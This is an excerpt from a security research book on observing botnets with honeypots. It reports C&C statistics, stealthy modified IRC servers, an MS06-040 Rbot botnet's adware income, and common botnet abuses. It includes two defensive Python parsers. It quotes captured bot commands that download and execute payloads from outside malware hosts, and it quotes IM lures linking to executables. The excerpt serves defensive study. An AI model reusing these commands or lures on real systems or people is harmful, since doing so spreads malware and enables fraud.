In this section we present some of the findings we obtained through our observation of botnets. Data is sanitized so that it does not allow one to draw any conclusions about specific attacks against a particular system, and it protects the identity and privacy of those involved. The information about specific attacks and compromised systems was forwarded to DFN-CERT (Computer Emergency Response Team), based in Hamburg, Germany.
The results are based on the observations collected with just a few virtual honeypot sensors, each running either nepenthes or a full high-interaction honeypot. We start with some statistics about the botnets we have observed in the last few months.
Number of botnets: We were able to track more than 900 botnets during a four-month period. Some of them went offline (i.e., C&C server went offline) and at the time of this writing, we are tracking more than 450 active botnets.
Number of hosts: During these few months, we saw more than 500,000 unique IP addresses joining at least one of the channels we monitored. Seeing an IP here means that the C&C server was not modified to suppress the JOIN message that is normally sent for each joining client. If an IRC server is modified not to show joining clients in a channel, we do not see IPs. Furthermore, some IRC servers obfuscate the joining clients' IP addresses, and obfuscated IP addresses do not count as seen either. This shows that the threat posed by botnets is probably worse than originally believed. Even if we are very optimistic and estimate that we track a significant percentage of all botnets and that none of our tracked botnet C&C servers are modified to hide JOINs or obfuscate the joining clients' IPs, this would mean that more than one million hosts are compromised and can be controlled by malicious attackers.
Figure 11.6 gives an overview of the most active, unobfuscated botnets during a four-week period. The biggest botnets we have seen in this shorter period had more than 30,000 bots joining the given control channel, and the other botnets were also quite active. Since many botnets obfuscate the number of bots in the botnet, we cannot easily estimate the real size of such a botnet.
Typical size of botnets: Some botnets consist of only a few hundred bots. In contrast to this, we have also monitored several large botnets with up to 40,000 hosts. The actual size of such a large botnet is hard to estimate. Often the attackers use heavily modified IRC servers and the bots are spread across several C&C servers which are linked together to form a common remote control network.
Dimension of DDoS attacks: We are able to make an educated guess about the current dimension of DDoS attacks caused by botnets. We can observe the commands issued by the controllers and thus see whenever the botnet is used for such attacks. During the observation period of four weeks, we were able to observe almost 300 DDoS attacks against 96 unique targets. Often these attacks targeted dial-up lines, but there are also attacks against bigger websites or other IRC servers.
Spreading of botnets: Commands issued for further spreading of the bots are the most frequently observed messages. Commonly, Windows systems are exploited, and thus we see most traffic on typical Windows ports used for file sharing.
"Updates" within botnets: We also observed updates of botnets quite frequently. Updating in this context means that the bots are instructed to download a piece of software from the Internet and then execute it. We could collect a little more than 300 new binaries by observing the control channel. These binaries were almost never detected by antivirus engines.
Botnet controllers also use modified IRC servers to make their botnet stealthier. The following listing is an example of a stripped-down IRC server, which does not report the usual information upon connecting. The arrows show the communication flow in both directions (bot versus botnet server):
$ nc 59.4.XXX.XXX 27397
-> PASS sM1d$t
-> USER XP-8308 * 0 :ZOMBIE1
-> NICK [P00|GBR|83519]
<- :sv8.athost.net 001 [P00|GBR|83519] :
<- :sv8.athost.net 002 [P00|GBR|83519] :
<- :sv8.athost.net 003 [P00|GBR|83519] :
<- :sv8.athost.net 004 [P00|GBR|83519] :
<- :sv8.athost.net 005 [P00|GBR|83519] :
<- :sv8.athost.net 422 [P00|GBR|83519] :
-> JOIN ##predb clos3d
<- :sv8.athost.net 332 [P00|GBR|83519] ##predb :
<- :sv8.athost.net 333 [P00|GBR|83519] ##predb frost
<- :sv8.athost.net NOTICE [P00|GBR|83519] :*** You were forced to join ##d
<- :sv8.athost.net 332 [P00|GBR|83519] ##d :.get http//www.netau.dk/media/mkeys.knt C:\WINDOWS\system32\tdmk.exe r h
<- :sv8.athost.net 333 [P00|GBR|83519] ##d frost
Presumably the attacker took the source code of a given IRC server and removed most status messages to avoid being too noisy and giving too much information away. When tracking such a botnet, it is usually not possible to guess its size. We cannot get any additional information about other bots on the network and can only monitor the commands issued by the attacker.
Something we also observe quite often is that the controllers change the protocol of the whole IRC server and modify it in such a way that you cannot use a traditional IRC client to connect to it. For example, the attacker can replace the normal IRC status messages and use other keywords. The following listing gives an example of where the C&C server uses a different syntax:
The modification is rather simple: This server uses SENDN and SENDU instead of the normal NICK and USER, respectively. But even this small change prohibits the use of a traditional IRC client to connect to this botnet and observe it. In this example, we used netcat to connect to the botnet and manually implemented the new protocol. Thanks to the modular design of botspy, it is also easily possible to extend the tool and write a module that can communicate with the modified server.
But there are also modifications regarding the communication protocol that we cannot easily adopt. For example, the botnet controller can implement an encryption scheme — that is, he sends encrypted commands to the bots, which in turn decrypt and execute them. The following listing is an example of such an encrypted session on top of standard IRC:
$ nc 66.186.XXX.XXX 8080
-> USER ri ri ri :Gahoulir Rybur
-> NICK rIPRLXJK
<- :@_@ 001 rIPRLXJK :
-> JOIN ##
<- :x.hub.x 332 rIPRLXJK ##
<- :=PGNRFf3doG3sSvCTQcY7fkMT+ugAsa3grGtcykWAqXQxjMXc0py7XWz3YgUx
y3W/Q3gqt/DObWs/SqIBLFu8MZIHGpvf+AYdpjI5X0FXen2L+v7E36ga+boWk5
lFKWomWxtaTlPdofn/GVuW9oe1KFlEaDEtIwnvbg2kTlVAo6kextoPUae5Yvsq
W4E7y414nj1U75hH3Dj/XCZ
The topic of the channel contains encrypted commands, which we unfortunately cannot understand. By reverse engineering the bot, it is possible to find out the issued command, but this is a time-consuming and cumbersome job.
Botnets also use other communication channels for remote command and control. For example, we observed a bot that contacted a given IP address on TCP port 80 after successful infection. The bot did not send any information to that remote host but instantly received commands once the TCP session was established. The following listing shows an example of the commands received:
$ nc 69.64.XXX.XXX 80
down http//www.lollpics.net/jackjohnson.mp3 a.exe;shell a.exe;down http//promo.dollarrevenue.com/webmasterexe/drsmartload1135a.exe drsmartload1135a.exe;shell drsmartload1135a.exe;down http//www.uglyphotos.net/Yinstall.mp3 Yinstall.exe;shell Yinstall.exe;down http//www.lollpics.net/mcsh.mp3 mny.exe;shell mny.exe;shell a.exe;
Again, we use the tool netcat to connect to TCP port 80. Once we are connected, we receive four different download commands. For each URL, the bot downloads the file to the local system and afterward executes it. This way, the attacker can execute commands on the compromised machine, and he does not need the overhead caused by using an IRC server for C&C. This is an example of an advanced botnet that acts rather stealthily.
For propagating further, bots normally use the most prevalent vulnerabilities in network services of Microsoft Windows. But there are also other propagation mechanisms — for example, via instant messenger (IM) tools. The attacker instructs the bots to send out IM messages like the following:
.aim hey, would you mind if I uploaded 1 of our Europe trip pictures of us to myspace? <A HREF="http://www.diveclub.com.pl/dc/components/com_extcalendar/pictures-europe1035.pif">http//www.gif-place.org/users/diveclub.pl/images/pictures-europe1035.gif</A> ,its the one with us on the beach in bikinis.
.aim ooooo. I bet Cingular isnt happy. <A HREF="http://www.loadingringtones.usa.gs">http//www.cingular.com/phoneactivations/phones/loadingringtones.usa.gs</A> is stuck on the ringtones page haha. Supposed to be for "New Phone Activations." I tried it, got my 10. hurry b4 its fixed.
These messages commonly contain social engineering tricks to lure the victim into clicking on the provided link, which in turn opens an executable containing some kind of malware.
As a longer example, we want to take a look at one specific botnet that was very interesting from an analysis point of view. It highlights the typical modus operandi of attackers and shows how they can make money with the help of bots and botnets.
At the beginning of August 2006, Microsoft released MS Security Bulletin MS06-040 with the title Vulnerability in Server Service Could Allow Remote Code Execution. This security bulletin contains information about a vulnerable network service that can be exploited to execute arbitrary commands on the victim's machine. A few days later, the first proof of concept exploits were released. These exploits allowed the manual compromise of machines, so there was no automation yet. But a couple of days later, the first botnets were observed that use this specific vulnerability to propagate further. Thus, the time between a vulnerability announcement and the integration of the exploit in botnets is just a couple of days.
With the help of several honeypots, we quickly caught a sample of such a bot binary: We set up several virtual high-interaction honeypots based on VMware running Windows 2000 without the patch provided for MS06-040. By closely monitoring the honeypots, we quickly noticed when one of them was infected. Extracting the bot from the infected machine was then rather easy. Through automated analysis, we could retrieve the information about the corresponding botnet in a couple of minutes. The botnet used the DNS name gzn.lx.irc-XXX.org and the server for C&C was listening on TCP port 45130. The main control channel was ##Xport## and the nickname had the form RBOT|DEU|XP-SP0-36079.
For tracking this botnet, we used a normal IRC client. Since it used standard IRC commands, no special tool was necessary. We configured the IRC client with all necessary parameters and then connected to the botnet C&C server. When joining the main control channel ##Xport##, the topic was set to .ircraw join ##scan##,##DR##,##frame##,##o##. The channel topic is interpreted by the bots as a command, and thus they join four additional channels:
##scan##: the topic of this channel was .scan netapi 10030-r-b-s.
Therefore, this channel is used for propagation — that is, scanning for other vulnerable machines and exploiting them.
##DR##: this channel had the topic .download http://promo.dollarrevenue.com/webmasterexe/drsmartload152a.exe c:\dr.exe 1 -s.
It instructs the bots to download an executable from the given address, store it locally on the C:\ drive, and execute it. An analysis of the executable showed that it is used to display advertisement on the machine it is installed on. We take a closer look at this topic later.
##frame##: similar to the previous channel, this channel is also used to generate revenue for the attacker. The topic was set to .download http://zchxsikpgz.biz/dl/loadadv518.exe c:\frm.exe 1 -s.
Hence, the bots download an additional executable and a closer analysis revealed that this binary was also used for advertisement.
##o##: using this channel, the botnet controller installed a third executable on all compromised machines. This channel had the topic .download http://64.18.150.156/niga/nads.exe c:\nds.exe 1 -s,
which also caused the bots to download and execute a file from the given location. This executable is a keylogger, enabling more ways to steal sensitive information from the infected machines.
The following listing was captured when observing the channel ##scan## for less than five minutes:
00:06 < RBOT|JPN|XP-SP0-51673> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 59.87.205.37.
00:06 < RBOT|USA|XP-SP1-29968> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 24.85.98.171.
00:07 < RBOT|USA|2K-90511> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 87.192.56.89.
00:07 < RBOT|ITA|2K-89428> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 87.0.189.99.
00:07 < RBOT|PRT|XP-SP0-17833> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 89.152.114.8.
00:07 < RBOT|F|USA|XP-SP0-67725> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 192.168.1.4.
00:07 < RBOT|USA|XP-SP0-62279> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 12.75.18.139.
00:07 < RBOT|JPN|XP-SP0-77299> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 219.167.140.234.
00:07 < RBOT|FRA|2K-22302> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 83.112.179.38.
00:08 < RBOT|ESP|XP-SP0-16174> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 81.37.168.73.
00:08 < RBOT|GBR|XP-SP1-63539> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 86.128.154.138.
00:08 < RBOT|USA|2K-54815> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 204.16.147.68.
00:08 < RBOT|ESP|XP-SP0-36463> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 201.222.226.84.
00:08 < RBOT|ITA|2K-39418> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 82.59.174.137.
00:08 < RBOT|F|ESP|XP-SP1-72157> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 192.168.1.17.
00:09 < RBOT|BRA|XP-SP0-17313> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 201.64.25.118.
00:09 < RBOT|USA|XP-SP0-47155> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 200.8.5.13.
00:09 < RBOT|DEU|XP-SP1-35171> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 87.245.51.164.
00:10 < RBOT|ESP|2K-80303> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 201.255.31.232.
00:10 < RBOT|ESP|XP-SP1-12053> [Main]:| This| is| the| first| time| that| Rbot| v2| is| running| on:| 200.105.18.75.
As you can see, the propagation was working quite well for the botnet controller. This is due to the fact that, at this point in time, there were many machines that were not yet patched against this new vulnerability.
In the channel ##scan##, the attacker changed the topic several times a day. He often instructed the bots to scan a certain network range — for example, via the command scan netapi 100 3 0 208.102.x.x -r -s or .scan netapi 100 3 0 216.196.x.x -r -s, to scan the network 208.102.0.0/16 or 216.196.0.0/16, respectively. Almost all network ranges belong to dial-up providers. Presumably he expects to find many nonpatched machines in these ranges, and he systematically scanned them.
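Since the bots execute whatever the channel topic says, a tracker only needs the 332 topic replies to see what the botnet is being told to do. The following Python parser is an added example (not code from the book or from botspy): it extracts the dot-commands from 332 replies, distinguishes the join, scan and download commands quoted above, and turns the 208.102.x.x notation of the ##scan## topics into CIDR form. The server name and nick are taken from the text; the sample lines themselves are constructed here.

```python
import re
from ipaddress import ip_network

# Constructed sample: what a tracking client sees from the C&C server described in
# the text. 332 numerics carry the channel topic, which the bots execute as a command.
# Server name, nick and topics are from the text; the raw lines are assembled here.
SAMPLE_LINES = [
    ":gzn.lx.irc-XXX.org 001 RBOT|DEU|XP-SP0-36079 :",
    ":gzn.lx.irc-XXX.org 332 RBOT|DEU|XP-SP0-36079 ##Xport## :.ircraw join ##scan##,##DR##,##frame##,##o##",
    ":gzn.lx.irc-XXX.org 332 RBOT|DEU|XP-SP0-36079 ##scan## :.scan netapi 100 3 0 208.102.x.x -r -s",
    ":gzn.lx.irc-XXX.org 332 RBOT|DEU|XP-SP0-36079 ##DR## :.download http://promo.dollarrevenue.com/webmasterexe/drsmartload152a.exe c:\\dr.exe 1 -s",
    ":gzn.lx.irc-XXX.org 332 RBOT|DEU|XP-SP0-36079 ##scan## :.scan netapi 100 3 0 216.196.x.x -r -s",
]

def parse_irc_line(line):
    """Split one raw IRC line into (prefix, command, params, trailing), RFC 1459 style.
    Returns None for an empty line; trailing is None when the line has no ' :' part."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    tokens = head.split()
    if not tokens:
        return None
    return prefix, tokens[0], tokens[1:], (trailing if sep else None)

# Network notation used in the ##scan## topics: "208.102.x.x" means the whole /16.
SCAN_RANGE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.x\.x$")

def scan_target_network(token):
    """'208.102.x.x' -> '208.102.0.0/16'; None for tokens that are not a range."""
    m = SCAN_RANGE.match(token)
    if m is None:
        return None
    return str(ip_network(f"{m.group(1)}.{m.group(2)}.0.0/16"))

def classify_topic_command(topic):
    """Map a dot-command found in a channel topic to the action it triggers in the bots.
    Only the verbs seen in the text (.ircraw join, .scan, .download/.get) are modelled."""
    parts = topic.split()
    if not parts or not parts[0].startswith("."):
        return None
    verb = parts[0][1:].lower()
    if verb == "scan":
        nets = [n for n in map(scan_target_network, parts[1:]) if n]
        return {"action": "propagate", "exploit": parts[1] if len(parts) > 1 else None,
                "networks": nets}
    if verb in ("download", "get") and len(parts) > 1:
        return {"action": "install", "url": parts[1],
                "path": parts[2] if len(parts) > 2 else None}
    if verb == "ircraw" and len(parts) > 2 and parts[1].lower() == "join":
        return {"action": "join", "channels": parts[2].split(",")}
    return {"action": "other", "verb": verb}

def extract_topic_commands(lines):
    """Return (channel, command info) for every 332 topic reply carrying a bot command."""
    found = []
    for line in lines:
        parsed = parse_irc_line(line)
        if parsed is None:
            continue
        _, command, params, trailing = parsed
        if command != "332" or len(params) < 2 or trailing is None:
            continue
        info = classify_topic_command(trailing)
        if info is not None:
            found.append((params[1], info))
    return found

if __name__ == "__main__":
    for channel, info in extract_topic_commands(SAMPLE_LINES):
        print(channel, info)
```

The same 332 handling applies to the stripped-down server shown earlier, whose ##d topic carried a .get command, since only the prefix and the verb differ.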
The interesting aspect is how the controller of the botnet uses it for his financial advantage. We observed the network for about one week, and during this period, no single DDoS attack was started from this rather large botnet. Instead, the botnet controller just installed adware on the compromised machines. As we have just seen, the two channels ##DR## and ##frame## are used to install additional software on the infected machines. The first channel installs a binary from the domain www.dollarrevenue.com. From the description of the website:
"DollarRevenue is one of the best pay-per-install affiliate programs on the Internet. DollarRevenue provides revenue opportunities to affiliates who have entertainment/content websites, offering them an alternative to traditional advertising methods. DollarRevenue offers high payouts per install and converts internet traffic from any country into real income. There is no better way to convert your traffic into money!"
So the "business model" of the botnet controller is to install the binary provided from DollarRevenue on the compromised machine and get some revenue via this pay-per-install affiliate program. The payout rates are depicted in Table 11.2. As you can see, these rates vary per country. English-speaking countries generate more revenue, whereas all other countries have a rather low revenue.
Country | Payout per install
USA | $0.30
Canada | $0.20
United Kingdom | $0.10
China | $0.01
Other countries | $0.02
Based on all information we have collected when observing the botnet, we can get an insight into the economic aspects of botnets. For example, on August 28, 7729 unique bots were seen in the main channel. Since the nickname of the bots (e.g., RBOT|USA|XP-SP1-15442 or RBOT|CHN|2K-65840) gives us a pretty good idea of which country the bot is located in, we can estimate the amount of money he receives via DollarRevenue. On that particular day, 998 U.S.-based, 20 CAN-based, 103 GBR-based, and 756 CHN-based bots were seen in the channel. Based on these numbers, we can calculate that the botnet controller earned about $438 with just this single channel on a single day. The channel ##frame## was used for another affiliate program, so the botnet controller earned even more. Over the whole one-week period, we have seen more than 40,000 different nicknames in the channel, so we can estimate that the botnet controller earned thousands of dollars via the affiliate programs. In addition, he installed a keylogger via the channel ##o##. This tool can be used to steal sensitive information from the compromised machines, which can then be used for identity theft or other nefarious purposes. Therefore, the attacker can generate even more revenue with his botnet.
Something interesting, but rarely seen, is botnet owners discussing issues in their bot channel. We observed several of these conversations and learned more about their social life this way. The bot-herders often discuss issues related to botnets but also talk about other computer crime–related things or simply about what they do.
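The revenue estimate above can be reproduced from the nickname format and Table 11.2. The following Python is an added example (not code from the book): it pulls the country code out of Rbot-style nicknames, counts bots per country, and applies the payout rates; the nickname sample is constructed from the forms seen in the ##scan## listing, and august_28_estimate() uses the figures quoted in the text.

```python
from collections import Counter

# Payout per install from Table 11.2 (US dollars). "*" is the rate for every other country.
DOLLARREVENUE_RATES = {"USA": 0.30, "CAN": 0.20, "GBR": 0.10, "CHN": 0.01, "*": 0.02}

# Constructed sample of nicknames in the form seen in the ##scan## listing above.
SAMPLE_NICKS = [
    "RBOT|JPN|XP-SP0-51673", "RBOT|USA|XP-SP1-29968", "RBOT|USA|2K-90511",
    "RBOT|ITA|2K-89428", "RBOT|F|USA|XP-SP0-67725", "RBOT|GBR|XP-SP1-63539",
    "RBOT|CHN|2K-65840",
]

def country_from_nick(nick):
    """Country code embedded in an Rbot nickname, e.g. RBOT|USA|XP-SP1-15442 -> 'USA'.
    Some nicks carry an extra one-letter flag field (RBOT|F|USA|...), so the code is
    the first three-letter upper-case field after the bot name. None if there is none."""
    for field in nick.strip("[]").split("|")[1:]:
        if len(field) == 3 and field.isalpha() and field.isupper():
            return field
    return None

def count_countries(nicks):
    """Number of bots per country for a set of unique nicknames."""
    return Counter(c for c in map(country_from_nick, nicks) if c is not None)

def estimate_payout(country_counts, rates=DOLLARREVENUE_RATES):
    """Pay-per-install revenue if every counted bot ran the installer once."""
    total = sum(n * rates.get(country, rates["*"]) for country, n in country_counts.items())
    return round(total, 2)

def august_28_estimate():
    """Figures given in the text for August 28: 7729 unique bots, of which
    998 USA, 20 CAN, 103 GBR and 756 CHN; the remainder fall under 'other'."""
    counts = {"USA": 998, "CAN": 20, "GBR": 103, "CHN": 756}
    counts["other"] = 7729 - sum(counts.values())
    return estimate_payout(counts)

if __name__ == "__main__":
    sample = count_countries(SAMPLE_NICKS)
    print(dict(sample), "->", estimate_payout(sample))
    print("August 28 estimate: $", august_28_estimate())
```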
Our observations showed that often botnets are run by young males with surprisingly limited programming skills. These people often achieve a good spread of their bots, but their actions are more or less harmless. Nevertheless, we also observed some more advanced attackers, but these persons join the control channel only occasionally. They use only one-character nicks, issue a command, and leave. The updates of the bots they run are very professional. Probably these people use the botnets for commercial usage and sell the services. More and more attackers use their botnets for financial gain. For example, by installing browser extensions, they are able to track/fool websurfers, click pop-ups in an automated way, or post adware as presented in the previous section. A small percentage of bot-herders seem highly skilled. They strip down the software used to run the C&C server to a non-RFC-compliant daemon, not even allowing standard IRC clients to connect.
Moreover, the data we captured while observing the botnets show that these control networks are used for more than just DDoS attacks. Possible usages of botnets can be categorized as listed here. And since a botnet is nothing more than a tool, there are most likely other potential uses that we have not listed.
Spamming: Some bots offer the possibility to open a SOCKS v4/v5 proxy — a generic proxy protocol for TCP/IP-based networking applications — on a compromised machine. After enabling the SOCKS proxy, this machine can then be used for nefarious tasks such as sending bulk e-mail (spam) or phishing mails. With the help of a botnet and thousands of bots, an attacker is able to send massive amounts of spam. Some bots also implement a special function to harvest e-mail addresses from the victims.
In addition, this can, of course, also be used to send phishing mails, since phishing is a special case of spam. Also increasing is so-called stock spam: advertising of stocks in spam e-mails. In a study we could show that stock spam indeed influences financial markets [5].
Spreading new malware: In many cases, botnets are used to spread new bots. This is very easy, since all bots implement mechanisms to download and execute a file via HTTP or FTP. But spreading an e-mail virus using a botnet is a very nice idea, too. A botnet with 10,000 hosts that acts as the start base for the mail virus allows very fast spreading and thus causes more harm. The Witty worm, which attacked the ICQ protocol parsing implementation in Internet Security Systems (ISS) products, is suspected to have been initially launched by a botnet because some of the attacking hosts were not running any ISS services.
Installing advertisement addons and Browser Helper Objects (BHOs): Botnets can also be used to gain financial advantages. This works by setting up a fake website with some advertisements. The operator of this website negotiates a deal with some hosting companies that pay for clicks on advertisements. With the help of a botnet, these clicks can be automated so that instantly a few thousand bots click on the pop-ups. This process can be further enhanced if the bot hijacks the start-page of a compromised machine so that the clicks are executed each time the victim uses the browser.
Google AdSense abuse: A similar abuse is also possible with Google's AdSense program. AdSense offers companies the possibility to display Google advertisements on their own website and earn money this way. The company earns money due to clicks on these ads — for example, per 10,000 clicks in one month. An attacker can abuse this program by leveraging his botnet to click on these advertisements in an automated fashion and thus artificially increments the click counter. This kind of usage for botnets is relatively uncommon but not a bad idea from an attacker's perspective.
Attacking IRC networks: Botnets are also used for DDoS attacks against IRC networks. Popular among attackers is especially the so-called clone attack. In this kind of attack, the controller orders each bot to connect a large number of clones to the victim's IRC network. The victim is overwhelmed by service requests from thousands of (cloned) bots.
Manipulating online polls/games: Online polls/games are getting more and more attention, and it is rather easy to manipulate them with botnets. Since every bot has a distinct IP address, every vote will have the same credibility as a vote cast by a real person. Online games can be manipulated in a similar way.
Currently we are aware of bots being used that way, and there is a chance that this will get more important in the future.
Sniffing traffic: Bots can also use a packet sniffer to watch for interesting clear-text data passing by a compromised machine. The sniffers are mostly used to retrieve sensitive information like usernames and passwords.
But the sniffed data can also contain other interesting information: If a machine is compromised more than once and is thus a member of more than one botnet, packet sniffing allows the attacker to gather the key information of the other botnet. Thus, it is possible to "steal" another botnet.
Keylogging: If the compromised machine uses encrypted communication channels (e.g., HTTPS or POP3S), then just sniffing the network packets on the victim's computer is useless, since the appropriate key to decrypt the packets is missing. But most bots also implement functions to log keystrokes. With the help of a keylogger, it is very easy for an attacker to retrieve sensitive information.
An implemented filtering mechanism (e.g., "I am only interested in key sequences near the keyword 'paypal.com'") further helps in stealing secret data.
Harvesting of information: Sometimes we can also observe the harvesting of information from all compromised machines. With the help of special commands, the operator of the botnet can request a list of sensitive information from all bots.
With our method we can shut down the root cause of all of these types of nuisances, and hence the preceding methodology can be used to combat more than just DDoS.
Often the combination of different functionality just described can be used for large-scale identity theft, one of the fastest-growing crimes on the Internet. Phishing mails that pretend to be legitimate (such as fake banking e-mails) ask their intended victims to go online and submit their personal information. These fake e-mails are generated and sent by bots via their spamming mechanism. These same bots can also host multiple fake websites pretending to be well-known brands and harvest personal information. As soon as one of these fake sites is shut down, another one can pop up. In addition, keylogging and sniffing of traffic can also be used for identity theft.
This list demonstrates that attackers can cause a great deal of harm or criminal activity with the help of botnets. In the future we want to investigate how our methodology can be used to counter these attacks.